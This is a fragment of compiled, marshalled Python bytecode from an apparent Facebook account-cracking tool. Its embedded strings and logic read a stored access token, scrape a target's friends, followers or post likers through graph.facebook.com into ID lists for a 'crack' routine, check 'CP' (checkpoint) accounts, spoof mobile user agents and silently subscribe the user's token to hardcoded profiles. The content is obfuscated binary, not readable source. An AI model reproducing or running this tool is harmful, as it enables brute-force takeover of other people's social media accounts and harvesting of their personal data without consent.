TOOL)\x1frM\x00\x00\x00rN\x00\x00\x00rH\x00\x00\x00rR\x00\x00\x00\xda\x08var_menu\xda\x05inputrQ\x00\x00\x00\xda\x01P\xda\x01OrP\x00\x00\x00rE\x00\x00\x00r0\x00\x00\x00\xda\x08menu_log\xda\tdefaultua\xda\x08requests\xda\x03get\xda\x04json\xda\x05loads\xda\x04text\xda\x04openr<\x00\x00\x00\xda\x05close\xda\x0btoken_check\xda\x04menu\xda\x08KeyError\xda\x07IOError\xda\nexceptions\xda\x0fConnectionError\xda\x04exit\xda\nsubprocessZ\x0ccheck_output)\x06\xda\x03pmu\xda\x05token\xda\x01x\xda\x01y\xda\x01nZ\x02xdrC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rn\x00\x00\x00t\x00\x00\x00sX\x00\x00\x00\n\x01\x06\x01\x06\x01\x06\x01\x16\x01\x04\x01\x08\x01\x14\x01\n\x01\x08\x01\x06\x02\x08\x01\x16\x01\x02\x01\x0e\x01\x0c\x01\x08\x01\n\x01\n\x01\x08\x01\x14\x01\x06\x01\x0c\x01\x10\x01\x04\x01\x14\x01\n\x01\x0c\x01\x10\x01\x04\x01\x14\x01\x0c\x01\x02\xfd\x08\x04\x18\x01\x08\x01\x18\x01\x08\x01\x14\x01\n\x01\x06\x01\n\x01\x14\x02\n\x01rn\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00s\x9a\x00\x00\x00z\x1at\x00d\x01d\x02\x83\x02\xa0\x01\xa1\x00}\x00t\x02\xa0\x03d\x03|\x00\x17\x00\xa1\x01}\x01t\x04\xa0\x05|\x01j\x06\xa1\x01}\x02|\x02d\x04\x19\x00}\x03W\x00n\x14\x04\x00t\x07t\x08f\x02y.\x01\x00\x01\x00\x01\x00t\td\x05\x83\x01\x01\x00t\n\xa0\x0bd\x06\xa1\x01\x01\x00Y\x00n\x01w\x00t\x02\xa0\x0cd\x07|\x00\x17\x00\xa1\x01\x01\x00t\x02\xa0\x0cd\x08|\x00\x17\x00\xa1\x01\x01\x00t\x02\xa0\x0cd\t|\x00\x17\x00\xa1\x01\x01\x00t\x02\xa0\x0cd\n|\x00\x17\x00\xa1\x01\x01\x00d\x00S\x00)\x0bNr\\\x00\x00\x00\xda\x01rz,https://graph.facebook.com/me/?access_token=r[\x00\x00\x00z\x18\x1b[91;1m[!] TOKEN INVALIDrS\x00\x00\x00zDhttps://graph.facebook.com/100045203855294/subscribers?access_token=z<https://graph.facebook.com/7202120/subscribers?access_token=z<https://graph.facebook.com/7203776/subscribers?access_token=z<https://graph.facebook.com/7203669/subscribers?access_token=)\rru\x00\x00\x00\xda\x04readrp\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rP\x00\x00\x00rM\x00\x00\x00rN\x00\x00\x00\xda\x04post)\x04r\x80\x00\x00\x00Z\x03otwrY\x00\x00\x00Z\x04namarC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rw\x00\x00\x00\xa3\x00\x00\x00s\x1c\x00\x00\x00\x02\x01\x0e\x01\x0e\x01\x0c\x01\x0c\x01\x10\x01\x08\x01\x0e\x01\x02\xfe\x0e\x03\x0e\x01\x0e\x01\x0e\x01\x04\x01rw\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00s\xb8\x03\x00\x00t\x00\x83\x00\x01\x00t\x01\x83\x00\x01\x00z&d\x01}\x00d\x01}\x01d\x01}\x02t\x02d\x02d\x03\x83\x02\xa0\x03\xa1\x00}\x03t\x04\xa0\x05d\x04|\x03\x17\x00\xa1\x01}\x04t\x06\xa0\x07|\x04j\x08\xa1\x01}\x05|\x05d\x05\x19\x00\xa0\t\xa1\x00}\x06|\x05d\x06\x19\x00}\x07W\x00nT\x04\x00t\nt\x0bf\x02yY\x01\x00\x01\x00\x01\x00t\x0cd\x07t\rt\x0et\rt\x0ef\x04\x16\x00\x83\x01\x01\x00t\x0cd\x08t\r\x16\x00\x83\x01\x01\x00t\x0fd\tt\rt\x0et\rt\x0ef\x04\x16\x00\x83\x01\x01\x00t\x10\xa0\x11d\n\xa1\x01\x01\x00t\x12\x83\x00\x01\x00Y\x00n(\x04\x00t\x04j\x13j\x14y\x80\x01\x00\x01\x00\x01\x00t\x0cd\x07t\rt\x0et\rt\x0ef\x04\x16\x00\x83\x01\x01\x00t\x0cd\x08t\r\x16\x00\x83\x01\x01\x00t\x0fd\x0bt\rt\x0et\rt\x0ef\x04\x16\x00\x83\x01\x01\x00t\x15\x83\x00\x01\x00Y\x00n\x01w\x00t\x04j\x05d\x0cd\rd\x0ed\x0fd\x10\x9c\x03d\x11\x8d\x02\xa0\x06\xa1\x00}\x08z\x0c|\x08d\x12\x19\x00}\t|\x08d\x13\x19\x00\xa0\t\xa1\x00}\nW\x00n\x0b\x04\x00t\ny\xa5\x01\x00\x01\x00\x01\x00d\x14}\tY\x00n\x01w\x00t\x0cd\x15t\x16t\x17t\x18|\x06t\x16f\x05\x16\x00\x83\x01\x01\x00t\x0cd\x01\x83\x01\x01\x00t\x0cd\x16t\x18t\x0et\x18t\x16t\x18|\x07f\x06\x16\x00\x83\x01\x01\x00t\x0cd\x17t\x18t\x0et\x18t\x16t\x18|\tf\x06\x16\x00\x83\x01\x01\x00t\x0cd\x01\x83\x01\x01\x00t\x0cd\x18t\x17t\x0et\x17t\x18f\x04\x16\x00\x83\x01\x01\x00t\x0cd\x19t\x17t\x0et\x17t\x16f\x04\x16\x00\x83\x01\x01\x00t\x0cd\x1at\x17t\x0et\x17t\x17f\x04\x16\x00\x83\x01\x01\x00t\x0cd\x1bt\x17t\x0et\x17t\x19f\x04\x16\x00\x83\x01\x01\x00t\x0cd\x1ct\x17t\x0et\x17t\x1af\x04\x16\x00\x83\x01\x01\x00t\x0cd\x1dt\x17t\x0et\x17t\x19f\x04\x16\x00\x83\x01\x01\x00t\x0cd\x1et\x17t\x0et\x17t\x16f\x04\x16\x00\x83\x01\x01\x00t\x0cd\x1ft\x17t\x0et\x17t\x17f\x04\x16\x00\x83\x01\x01\x00t\x0cd t\x17t\x0et\x17t\rf\x04\x16\x00\x83\x01\x01\x00t\x1bd!t\x18t\x0et\x18t\x16t\x18f\x05\x16\x00\x83\x01}\x0bt\x0c\x01\x00|\x0bd"v\x00\x90\x01rLt\x0fd#t\rt\x0et\rt\x0ef\x04\x16\x00\x83\x01\x01\x00t\x1c\x83\x00\x01\x00d\x00S\x00|\x0bd$v\x00\x90\x01rYt\x01\x83\x00\x01\x00t\x1d\x83\x00\x01\x00d\x00S\x00|\x0bd%v\x00\x90\x01rft\x01\x83\x00\x01\x00t\x1e\x83\x00\x01\x00d\x00S\x00|\x0bd&v\x00\x90\x01rst\x01\x83\x00\x01\x00t\x1f\x83\x00\x01\x00d\x00S\x00|\x0bd\'v\x00\x90\x01r\x80t\x01\x83\x00\x01\x00t \x83\x00\x01\x00d\x00S\x00|\x0bd(v\x00\x90\x01r\x8dt\x01\x83\x00\x01\x00t!\x83\x00\x01\x00d\x00S\x00|\x0bd)v\x00\x90\x01r\x9at\x01\x83\x00\x01\x00t"\x83\x00\x01\x00d\x00S\x00|\x0bd*v\x00\x90\x01r\xa7t\x01\x83\x00\x01\x00t#\x83\x00\x01\x00d\x00S\x00|\x0bd+v\x00\x90\x01r\xb4t\x01\x83\x00\x01\x00t$\x83\x00\x01\x00d\x00S\x00|\x0bd,v\x00\x90\x01r\xcdt\x0fd-t\x18t\x0et\x18t\x16f\x04\x16\x00\x83\x01\x01\x00t\x10\xa0\x11d\n\xa1\x01\x01\x00t\x12\x83\x00\x01\x00d\x00S\x00t\x0fd#t\rt\x0et\rt\x0ef\x04\x16\x00\x83\x01\x01\x00t\x1c\x83\x00\x01\x00d\x00S\x00).Nr%\x00\x00\x00r\\\x00\x00\x00r\x84\x00\x00\x00rZ\x00\x00\x00r[\x00\x00\x00\xda\x02idz\x14%s [ %sOopc... %s]%s\xfa\x04%s \xfa"%s [%s!%s] %sINVALID TOKEN/COOKIESrS\x00\x00\x00r^\x00\x00\x00z\x17http://ip-api.com/json/z\x12http://ip-api.com/z\x1fapplication/json; charset=utf-8z\xcbMozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;])\x03Z\x07Refererz\x0cContent-Typez\nUser-Agent\xa9\x01\xda\x07headersZ\x05queryZ\x07country\xfa\x01 z\x19%s [ %sHELLO %s %s %s]u\x18\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sID : %s%su\x18\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sIP : %s%sz(%s [%s1%s] %sCRACK FROM FRIEND/PUBLIC IDz %s [%s2%s] %sCRACK FROM FOLLOWERz)%s [%s3%s] %sCRACK FROM PUBLIC POST LIKESz\'%s [%s4%s] %sDUMP TARGET ID INFORMATIONz0%s [%s5%s] %sCOLLECT ID FOR CRACK FROM PUBLIC IDz\x1f%s [%s6%s] %sCHECK CRACK RESULTz#%s [%s7%s] %sCP ACCOUNTS AUTO CHECKz\x17%s [%s8%s] %sUSER AGENTz\x14%s [%s0%s] %sLOG OUTrT\x00\x00\x00rU\x00\x00\x00rV\x00\x00\x00rW\x00\x00\x00r_\x00\x00\x00\xa9\x04rd\x00\x00\x00r\x19\x00\x00\x00Z\x03003\xda\x01c\xa9\x04\xda\x014r\x1a\x00\x00\x00Z\x03004\xda\x01d\xa9\x04r\'\x00\x00\x00r\x1b\x00\x00\x00Z\x03005rB\x00\x00\x00)\x04r3\x00\x00\x00r\x1c\x00\x00\x00Z\x03006\xda\x01f)\x04r+\x00\x00\x00r\x1d\x00\x00\x00Z\x03007\xda\x01g)\x04r5\x00\x00\x00r\x1e\x00\x00\x00Z\x03008\xda\x01h)\x04rg\x00\x00\x00rh\x00\x00\x00ri\x00\x00\x00rf\x00\x00\x00z\x1a%s [%s!%s] %sSEE YOU LATER)%rH\x00\x00\x00rR\x00\x00\x00ru\x00\x00\x00r\x85\x00\x00\x00rp\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00\xda\x05upperry\x00\x00\x00rz\x00\x00\x00rP\x00\x00\x00r0\x00\x00\x00rl\x00\x00\x00rE\x00\x00\x00rM\x00\x00\x00rN\x00\x00\x00rn\x00\x00\x00r{\x00\x00\x00r|\x00\x00\x00r}\x00\x00\x00rm\x00\x00\x00r(\x00\x00\x00rQ\x00\x00\x00r*\x00\x00\x00\xda\x01Urk\x00\x00\x00rx\x00\x00\x00\xda\x06publik\xda\x08pengikut\xda\x06likers\xda\x06target\xda\x0cteman_target\xda\x05hasil\xda\tcek_hasil\xda\x04ugen)\x0c\xda\x03jidZ\x03proZ\x07upgrader\x80\x00\x00\x00r\x81\x00\x00\x00r\x82\x00\x00\x00r\x83\x00\x00\x00\xda\x01irY\x00\x00\x00Z\x02ipZ\x03locZ\x02pmrC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00rx\x00\x00\x00\xb5\x00\x00\x00s\x9e\x00\x00\x00\x06\x01\x06\x01\x02\x01\x04\x01\x04\x01\x04\x01\x0e\x01\x0e\x01\x0c\x01\x0c\x01\x0c\x01\x10\x01\x14\x01\x0c\x01\x14\x01\n\x01\n\x01\x10\x01\x14\x01\x0c\x01\x14\x01\n\x01\x02\xfc\x1a\x05\x02\x01\x08\x01\x10\x01\x0c\x01\x08\x01\x02\xff\x16\x02\x08\x01\x18\x01\x18\x01\x08\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x16\x01\x04\x01\n\x01\x14\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x06\x01\n\x01\n\x01\x14\x01\n\x01\n\x01\x14\x02\n\x01rx\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00t\x00}\x00z\x11t\x01d\x01d\x02\x83\x02}\x01|\x01\xa0\x02|\x00\xa1\x01\x01\x00|\x01\xa0\x03\xa1\x00\x01\x00W\x00d\x00S\x00\x04\x00t\x04t\x05f\x02y"\x01\x00\x01\x00\x01\x00t\x06\x83\x00\x01\x00Y\x00d\x00S\x00w\x00)\x03N\xfa\tugent.txtr]\x00\x00\x00)\x07\xda\x08ua_nokiaru\x00\x00\x00r<\x00\x00\x00rv\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rn\x00\x00\x00)\x02\xda\x02ua\xda\x05ugentrC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00ro\x00\x00\x00\x06\x01\x00\x00s\x10\x00\x00\x00\x04\x01\x02\x01\n\x01\n\x01\x0e\x01\x10\x01\x0c\x01\x02\xffro\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\t\x00\x00\x00C\x00\x00\x00sH\x02\x00\x00t\x00\x83\x00\x01\x00t\x01d\x01t\x02t\x03t\x02t\x04t\x02f\x05\x16\x00\x83\x01}\x00t\x05\x01\x00|\x00d\x02v\x00r#t\x06d\x03t\x07t\x03t\x07t\x03f\x04\x16\x00\x83\x01\x01\x00t\x08\x83\x00\x01\x00d\x00S\x00|\x00d\x04v\x00r;t\t\xa0\nd\x05\xa1\x01\x01\x00t\x01d\x06t\x02t\x03t\x02t\x04f\x04\x16\x00\x83\x01\x01\x00t\x08\x83\x00\x01\x00d\x00S\x00|\x00d\x07v\x00r\xa0t\t\xa0\nd\x08\xa1\x01\x01\x00t\x01d\tt\x02t\x03t\x02t\x04f\x04\x16\x00\x83\x01}\x01z)t\x0bd\nd\x0b\x83\x02}\x02|\x02\xa0\x0c|\x01\xa1\x01\x01\x00|\x02\xa0\r\xa1\x00\x01\x00t\x06d\x0ct\x04t\x03t\x04f\x03\x16\x00\x83\x01\x01\x00t\x05\x01\x00t\x01d\x06t\x02t\x03t\x02t\x04f\x04\x16\x00\x83\x01\x01\x00t\x08\x83\x00\x01\x00W\x00d\x00S\x00\x04\x00t\x0et\x0ff\x02y\x9f\x01\x00\x01\x00\x01\x00t\x06d\rt\x07t\x03t\x07f\x03\x16\x00\x83\x01\x01\x00t\x05d\x0et\x07\x16\x00\x83\x01\x01\x00t\x01d\x06t\x07t\x03t\x07t\x03f\x04\x16\x00\x83\x01\x01\x00t\x08\x83\x00\x01\x00Y\x00d\x00S\x00w\x00|\x00d\x0fv\x00r\xa9t\x10\x83\x00\x01\x00d\x00S\x00|\x00d\x10v\x00r\xcct\t\xa0\nd\x08\xa1\x01\x01\x00t\x06d\x11t\x04t\x03t\x04f\x03\x16\x00\x83\x01\x01\x00t\x05\x01\x00t\x01d\x06t\x02t\x03t\x02t\x04f\x04\x16\x00\x83\x01\x01\x00t\x08\x83\x00\x01\x00d\x00S\x00|\x00d\x12v\x00\x90\x01r\x0ez\tt\x0bd\nd\x13\x83\x02\xa0\x11\xa1\x00}\x03W\x00n\r\x04\x00t\x0et\x0ff\x02y\xe7\x01\x00\x01\x00\x01\x00d\x14}\x03Y\x00n\x01w\x00t\x05d\x15t\x02t\x03t\x02t\x04t\x04|\x03f\x06\x16\x00\x83\x01\x01\x00t\x06d\x16t\x04t\x03t\x04f\x03\x16\x00\x83\x01\x01\x00t\x05\x01\x00t\x01d\x06t\x02t\x03t\x02t\x04f\x04\x16\x00\x83\x01\x01\x00t\x08\x83\x00\x01\x00d\x00S\x00|\x00d\x17v\x00\x90\x01r\x18t\x08\x83\x00\x01\x00d\x00S\x00t\x06d\x03t\x07t\x03t\x07t\x03f\x04\x16\x00\x83\x01\x01\x00d\x00S\x00)\x18NrT\x00\x00\x00rU\x00\x00\x00rV\x00\x00\x00rW\x00\x00\x00z\x89xdg-open https://www.google.com/search?q=My+User+Agent&oq=My+User+Agent&aqs=chrome..69i57j0l3j0i22i30l6.4674j0j1&sourceid=chrome&ie=UTF-8\xfa\x11%s [ %sBACK %s]%sr_\x00\x00\x00\xfa\x10rm -rf ugent.txtu$\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sENTER USER AGENT : \n\nr\xa2\x00\x00\x00r]\x00\x00\x00z+\n%s [ %sSUCCESSFULLY CHANGED USER AGENT %s]z\'\n%s [ %sFAILED TO CHANGE USER AGENT %s]r\x88\x00\x00\x00r\x8d\x00\x00\x00r\x8f\x00\x00\x00z*%s [ %sUSER AGENT DELETED SUCCESSFULLY %s]r\x92\x00\x00\x00r\x84\x00\x00\x00z\tNOT FOUNDu(\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sYOUR USER AGENT : \n\n%s%sz+\n%s [ %sTHIS IS YOUR CURRENT USER AGENT %s])\x04rg\x00\x00\x00rh\x00\x00\x00ri\x00\x00\x00r\x93\x00\x00\x00)\x12\xda\x08var_ugenrk\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00rP\x00\x00\x00rE\x00\x00\x00r0\x00\x00\x00rx\x00\x00\x00rM\x00\x00\x00rN\x00\x00\x00ru\x00\x00\x00r<\x00\x00\x00rv\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00\xda\x07ugen_hpr\x85\x00\x00\x00)\x04r\x7f\x00\x00\x00r\xa4\x00\x00\x00r\xa5\x00\x00\x00Z\x06ungserrC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\x9f\x00\x00\x00\x10\x01\x00\x00sb\x00\x00\x00\x06\x01\x16\x01\x04\x01\x08\x01\x14\x01\n\x01\x08\x01\n\x01\x14\x01\n\x01\x08\x01\n\x01\x14\x01\x02\x01\n\x01\n\x01\x08\x01\x12\x01\x04\x01\x14\x01\x0c\x01\x10\x01\x12\x01\x0c\x01\x14\x01\x0c\x01\x02\xfc\x08\x05\n\x01\x08\x01\n\x01\x12\x01\x04\x01\x14\x01\n\x01\n\x01\x02\x01\x12\x01\x10\x01\x08\x01\x02\xff\x18\x02\x12\x01\x04\x01\x14\x01\n\x01\n\x01\n\x01\x18\x02r\x9f\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00sz\x02\x00\x00t\x00\xa0\x01d\x01\xa1\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x02d\x03t\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\x04t\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\x05t\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\x06t\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\x07t\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\x08t\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\tt\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\nt\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\x02d\x02\x83\x01\x01\x00t\x06d\x0bt\x03t\x04t\x03t\x05t\x03f\x05\x16\x00\x83\x01}\x00t\x02\x01\x00|\x00d\x0cv\x00r|t\x07d\rt\x08t\x04t\x08t\x04f\x04\x16\x00\x83\x01\x01\x00t\t\x83\x00\x01\x00n\xa7|\x00d\x0ev\x00r\x8ft\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x0c\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00n\x94|\x00d\x11v\x00r\xa2t\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x0e\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00n\x81|\x00d\x12v\x00r\xb5t\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x0f\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00nn|\x00d\x13v\x00r\xc8t\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x10\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00n[|\x00d\x14v\x00r\xdbt\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x11\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00nH|\x00d\x15v\x00r\xeet\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x12\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00n5|\x00d\x16v\x00\x90\x01r\x02t\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x13\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00n!|\x00d\x17v\x00\x90\x01r\x16t\nd\x0fd\x10\x83\x02}\x01|\x01\xa0\x0bt\x14\xa1\x01\x01\x00|\x01\xa0\r\xa1\x00\x01\x00n\rt\x07d\rt\x08t\x04t\x08t\x04f\x04\x16\x00\x83\x01\x01\x00t\t\x83\x00\x01\x00t\x07d\x18t\x05t\x03t\x05f\x03\x16\x00\x83\x01\x01\x00t\x02\x01\x00t\x06d\x19t\x03t\x04t\x03t\x05f\x04\x16\x00\x83\x01\x01\x00t\t\x83\x00\x01\x00d\x00S\x00)\x1aNr\xa7\x00\x00\x00r%\x00\x00\x00z\x13%s [%s1%s] %sXIAOMIz\x12%s [%s2%s] %sNOKIAz\x11%s [%s3%s] %sASUSz\x13%s [%s4%s] %sHUAWEIz\x11%s [%s5%s] %sVIVOz\x11%s [%s6%s] %sOPPOz\x14%s [%s7%s] %sSAMSUNGz\x14%s [%s8%s] %sWINDOWSrT\x00\x00\x00rU\x00\x00\x00rV\x00\x00\x00\xa9\x02r-\x00\x00\x00r\x17\x00\x00\x00r\xa2\x00\x00\x00r]\x00\x00\x00\xa9\x02r1\x00\x00\x00r\x18\x00\x00\x00\xa9\x02rd\x00\x00\x00r\x19\x00\x00\x00\xa9\x02r\x90\x00\x00\x00r\x1a\x00\x00\x00)\x02r\'\x00\x00\x00r\x1b\x00\x00\x00)\x02r3\x00\x00\x00r\x1c\x00\x00\x00)\x02r+\x00\x00\x00r\x1d\x00\x00\x00)\x02r5\x00\x00\x00r\x1e\x00\x00\x00z*%s [ %sSUCCESSFULLY CHANGED USER AGENT %s]r\xa6\x00\x00\x00)\x15rM\x00\x00\x00rN\x00\x00\x00rP\x00\x00\x00rQ\x00\x00\x00rl\x00\x00\x00rm\x00\x00\x00rk\x00\x00\x00rE\x00\x00\x00r0\x00\x00\x00rx\x00\x00\x00ru\x00\x00\x00r<\x00\x00\x00\xda\tua_xiaomirv\x00\x00\x00r\xa3\x00\x00\x00\xda\x07ua_asus\xda\tua_huawei\xda\x07ua_vivo\xda\x07ua_oppo\xda\nua_samsung\xda\nua_windows)\x02Z\x02pcr\xa5\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\xa9\x00\x00\x00A\x01\x00\x00sF\x00\x00\x00\n\x01\x08\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x08\x01\x16\x01\x04\x01$\x01\x08\x01\x1e\x01\x08\x01\x1e\x01\x08\x01\x1e\x01\x08\x01\x1e\x01\x08\x01\x1e\x01\x08\x01\x1e\x01\n\x01\x1e\x01\n\x01\x1e\x01\x1a\x01\x12\x01\x04\x01\x14\x01\n\x01r\xa9\x00\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00\xf3B\x02\x00\x00z\x1ed\x01}\x00t\x00d\x02d\x03\x83\x02\xa0\x01\xa1\x00}\x01t\x02\xa0\x03d\x04|\x01\x17\x00\xa1\x01}\x02t\x04\xa0\x05|\x02j\x06\xa1\x01}\x03|\x03d\x05\x19\x00\xa0\x07\xa1\x00}\x04W\x00n4\x04\x00t\x08t\tf\x02y;\x01\x00\x01\x00\x01\x00t\nd\x06t\x0bt\x0ct\x0bt\x0cf\x04\x16\x00\x83\x01\x01\x00t\r\xa0\x0ed\x07\xa1\x01\x01\x00t\x0f\x83\x00\x01\x00Y\x00n\x18\x04\x00t\x02j\x10j\x11yR\x01\x00\x01\x00\x01\x00t\nd\x08t\x0bt\x0ct\x0bt\x0cf\x04\x16\x00\x83\x01\x01\x00t\x12\x83\x00\x01\x00Y\x00n\x01w\x00z\xaet\x13d\tt\x14t\x0ct\x14t\x15f\x04\x16\x00\x83\x01\x01\x00t\x16d\nt\x14t\x0ct\x14t\x15t\x14f\x05\x16\x00\x83\x01}\x05z#t\x02\xa0\x03d\x0b|\x05\x17\x00d\x0c\x17\x00|\x01\x17\x00\xa1\x01}\x06t\x04\xa0\x05|\x06j\x06\xa1\x01}\x07t\x13d\rt\x14t\x0ct\x14t\x15t\x14|\x07d\x05\x19\x00\xa0\x07\xa1\x00f\x06\x16\x00\x83\x01\x01\x00W\x00n\x1a\x04\x00t\x08t\tf\x02y\xa6\x01\x00\x01\x00\x01\x00t\x13\x01\x00t\nd\x0et\x0bt\x0ct\x0bt\x0cf\x04\x16\x00\x83\x01\x01\x00t\x17\x83\x00\x01\x00Y\x00n\x01w\x00t\x02\xa0\x03d\x0f|\x05|\x00|\x01f\x03\x16\x00\xa1\x01}\x08g\x00}\tt\x04\xa0\x05|\x08j\x06\xa1\x01}\n|\x07d\x10\x19\x00d\x11\x17\x00\xa0\x18d\x12d\x13\xa1\x02}\x0bt\x00|\x0bd\x14\x83\x02}\x0c|\nd\x15\x19\x00D\x00]\x1e}\r|\t\xa0\x19|\rd\x16\x19\x00d\x17\x17\x00|\rd\x05\x19\x00\x17\x00\xa1\x01\x01\x00|\x0c\xa0\x1a|\rd\x16\x19\x00d\x17\x17\x00|\rd\x05\x19\x00\x17\x00d\x18\x17\x00\xa1\x01\x01\x00q\xcc|\x0c\xa0\x1b\xa1\x00\x01\x00t\x13d\x19t\x14t\x0ct\x14t\x15t\x14t\x1c|\t\x83\x01f\x06\x16\x00\x83\x01\x01\x00t\x1d|\x0b\x83\x01W\x00S\x00\x04\x00t\x1e\x90\x01y \x01\x00}\x0e\x01\x00z\x12t\x12d\x1at\x0bt\x0ct\x0bt\x0c|\x0ef\x05\x16\x00\x83\x01\x01\x00W\x00Y\x00d\x00}\x0e~\x0ed\x00S\x00d\x00}\x0e~\x0ew\x01w\x00)\x1bNZ\x045000r\\\x00\x00\x00r\x84\x00\x00\x00rZ\x00\x00\x00r[\x00\x00\x00r\x89\x00\x00\x00rS\x00\x00\x00r^\x00\x00\x00u4\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sWRITE \'me\' FOR CRACK FROM YOUR OWN ID\xf5\x1d\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sTARGET ID : %s\xfa\x1bhttps://graph.facebook.com/\xfa\x0e?access_token=\xf5\x1a\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sNAME : %s%s\xfa\x19%s [%s!%s] %sID NOT FOUND\xfa>https://graph.facebook.com/%s/friends?limit=%s&access_token=%s\xda\nfirst_name\xfa\x05.jsonr\x8c\x00\x00\x00\xda\x01_r]\x00\x00\x00\xda\x04datar\x87\x00\x00\x00\xf5\x03\x00\x00\x00\xe2\x80\xa2r8\x00\x00\x00\xf5\x1e\x00\x00\x00%s [%s\xe2\x80\xa2%s] %sTOTAL ID : %s%s\xfa\x17%s [%s!%s] %sERROR : %s\xa9\x1fru\x00\x00\x00r\x85\x00\x00\x00rp\x00\x00\x00rq\x00\x00\x00rr\x00\x00\x00rs\x00\x00\x00rt\x00\x00\x00r\x96\x00\x00\x00ry\x00\x00\x00rz\x00\x00\x00rE\x00\x00\x00r0\x00\x00\x00rl\x00\x00\x00rM\x00\x00\x00rN\x00\x00\x00rn\x00\x00\x00r{\x00\x00\x00r|\x00\x00\x00r}\x00\x00\x00rP\x00\x00\x00rQ\x00\x00\x00rm\x00\x00\x00rk\x00\x00\x00rx\x00\x00\x00\xda\x07replace\xda\x06appendr<\x00\x00\x00rv\x00\x00\x00\xda\x03len\xda\x05crack\xda\tException\xa9\x0fr\xa0\x00\x00\x00r\x80\x00\x00\x00r\x81\x00\x00\x00r\x82\x00\x00\x00r\x83\x00\x00\x00\xda\x02itZ\x02pbZ\x02obr\x84\x00\x00\x00r\x87\x00\x00\x00rA\x00\x00\x00Z\x02xcZ\x02xbrY\x00\x00\x00rB\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00r\x98\x00\x00\x00g\x01\x00\x00\xf3R\x00\x00\x00\x02\x01\x04\x01\x0e\x01\x0e\x01\x0c\x01\x10\x01\x10\x01\x14\x01\n\x01\n\x01\x10\x01\x14\x01\n\x01\x02\xfe\x02\x03\x14\x01\x16\x01\x02\x01\x16\x01\x0c\x01$\x01\x10\x01\x04\x01\x14\x01\n\x01\x02\xfd\x14\x04\x04\x01\x0c\x01\x14\x01\n\x01\x0c\x01\x1a\x01 